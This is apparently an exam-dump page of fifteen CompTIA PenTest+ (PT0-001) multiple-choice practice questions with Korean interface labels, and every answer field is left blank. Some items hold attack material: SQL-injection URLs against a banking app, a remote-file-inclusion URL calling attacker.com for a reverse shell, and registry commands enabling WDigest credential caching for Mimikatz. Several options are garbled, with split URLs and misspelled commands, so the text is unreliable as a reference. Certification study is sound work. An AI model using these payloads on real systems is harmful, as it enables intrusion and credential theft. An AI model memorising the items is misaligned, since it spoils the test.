CompTIA PT0-001 시험

Question No : 1

Which of the following reasons does penetration tester needs to have a customer's point-of -contact information available at all time? (Select THREE).

• A.To report indicators of compromise
• B.To report findings that cannot be exploited
• C.To report critical findings
• D.To report the latest published exploits
• E.To update payment information
• F.To report a server that becomes unresponsive
• G.To update the statement o( work
• H.To report a cracked password

답을 확인하기

정답:

Question No : 2

A penetration tester has been assigned to perform an external penetration assessment of a company .
Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)

• A.Wait outside of the company’s building and attempt to tailgate behind an employee.
• B.Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities, and attempt to gain access.
• C.Use domain and IP registry websites to identify the company’s external netblocks and external facing applications.
• D.Search social media for information technology employees who post information about the technologies they work with.
• E.Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access.

답을 확인하기

정답:

Question No : 3

Joe, an attacker, intends to transfer funds discreetly from a victim’s account to his own .
Which of the following URLs can he use to accomplish this attack?

• A.https://testbank.com/BankingApp/AC
• B.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846&notify=False&creditaccount=’OR 1=1 AND select username from testbank.custinfo where username like ‘Joe’&amount=200
• C.https://testbank.com/BankingApp/AC
• D.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846&notify=False&creditaccount=’OR 1=1 AND select username from testbank.custinfo where username like ‘Joe’ &amount=200
• E.https://testbank.com/BankingApp/AC
• F.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846&notify=True&creditaccount=’OR 1=1 AND select username from testbank.custinfo where username like ‘Joe’ &amount=200
• G.https://testbank.com/BankingApp/AC
• H.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846&notify=True&creditaccount=’AND 1=1 AND select username from testbank.custinfo where username like ‘Joe’ &amount=200

답을 확인하기

정답:

Question No : 4

The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on the network architecture diagram, which was supplied at the beginning of the test .
Which of the following are the MOST likely causes for this difference? (Select TWO)

• A.Storage access
• B.Limited network access
• C.Misconfigured DHCP server
• D.Incorrect credentials
• E.Network access controls

답을 확인하기

정답:

Question No : 5

A company received a report with the following finding . While on the internal network the penetration tester was able to successfully capture SMB broadcasted user ID and password information on the network and decode this information. This allowed the penetration tester to then join their own computer to the ABC domain.
Which of the following remediation’s are appropriate for the reported findings'? (Select TWO)

• A.Set the Schedule Task Service from Automatic to Disabled
• B.Enable network-level authentication
• C.Remove the ability from Domain Users to join domain computers to the network
• D.Set the netlogon service from Automatic to Disabled
• E.Set up a SIEM alert to monitor Domain joined machines
• F.Set "Digitally sign network communications" to Always

답을 확인하기

정답:

Question No : 6

A consultant is identifying versions of Windows operating systems on a network.
Which of the following Nmap commands should the consultant run?

• A.nmap -T4 -v -sU -iL /tmp/list.txt -Pn ―script smb-system-info
• B.nmap -T4 -v -iL /tmp/list .txt -Pn ―script smb-os-disccvery
• C.nmap -T4 -v -6 -iL /tmp/liat.txt -Pn ―script smb-os-discovery -p 135-139
• D.nmap -T4 -v ―script smb-system-info 192.163.1.0/24

답을 확인하기

정답:

Question No : 7

While conducting information gathering, a penetration tester is trying to identify Windows hosts .
Which of the following characteristics would be BEST to use for fingerprinting?

• A.The system responds with a MAC address that begins with 00:0A:3
• B.The system responds with port 22 open.
• C.The system responds with a TTL of 128.
• D.The system responds with a TCP window size of 5840.

답을 확인하기

정답:
Explanation:
Reference: https://social.technet.microsoft.com/Forums/windowsserver/en-US/67920af3-f60e-43dc-9941-feca54380b52/default-ttl-for-various-oss?forum=winserverpowershell#:~:text=The%20Default%20Ttl%20for%20windows,default%20for%20Unix%20is%2064

Question No : 8

A penetration tester has been hired to perform a penetration test for an organization .
Which of the following is indicative of an error-based SQL injection attack?

• A.a=1 or 1CC
• B.1=1 or bCC
• C.1=1 or 2CC
• D.1=1 or aCC

답을 확인하기

정답:

Question No : 9

A penetration tester is designing a phishing campaign and wants to build list of users (or the target organization .
Which of the following techniques would be the MOST appropriate? (Select TWO)

• A.Query an Internet WHOIS database.
• B.Search posted job listings.
• C.Scrape the company website.
• D.Harvest users from social networking sites.
• E.Socially engineer the corporate call center.

답을 확인하기

정답:

Question No : 10

A penetration tester is performing ARP spoofing against a switch .
Which of the following should the penetration tester spoof to get the MOST information?

• A.MAC address of the client
• B.MAC address of the domain controller
• C.MAC address of the web server
• D.MAC address of the gateway

답을 확인하기

정답:

Question No : 11

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?

• A.Implement a blacklist.
• B.Block URL redirections.
• C.Double URL encode the parameters.
• D.Stop external calls from the application.

답을 확인하기

정답:

Question No : 12

During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz.
Which of the following registry changes would allow for credential caching in memory?

• A.reg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 0
• B.reg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
• C.reg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
• D.reg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1

답을 확인하기

정답:

Question No : 13

Given the following Python code:
a = 'abcdefghijklmnop'
a[::2]
Which of the following will result?

• A.adgjmp
• B.pnlhfdb
• C.acegikmo
• D.ab

답을 확인하기

정답:
Explanation:
Reference: https://blog.finxter.com/python-double-colon/

Question No : 14

A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode .
Which of the following steps must the firm take before it can run a static code analyzer?

• A.Run the application through a dynamic code analyzer.
• B.Employ a fuzzing utility.
• C.Decompile the application.
• D.Check memory allocations.

답을 확인하기

정답:

Question No : 15

An attacker is attempting to gain unauthorized access to a WiR network that uses WPA2-PSK.
Which of the following attack vectors would the attacker MOST likely use?

• A.Capture a three-way handshake and crack it
• B.Capture a mobile device and crack its encryption
• C.Create a rogue wireless access point
• D.Capture a four-way handshake and crack it

답을 확인하기

정답: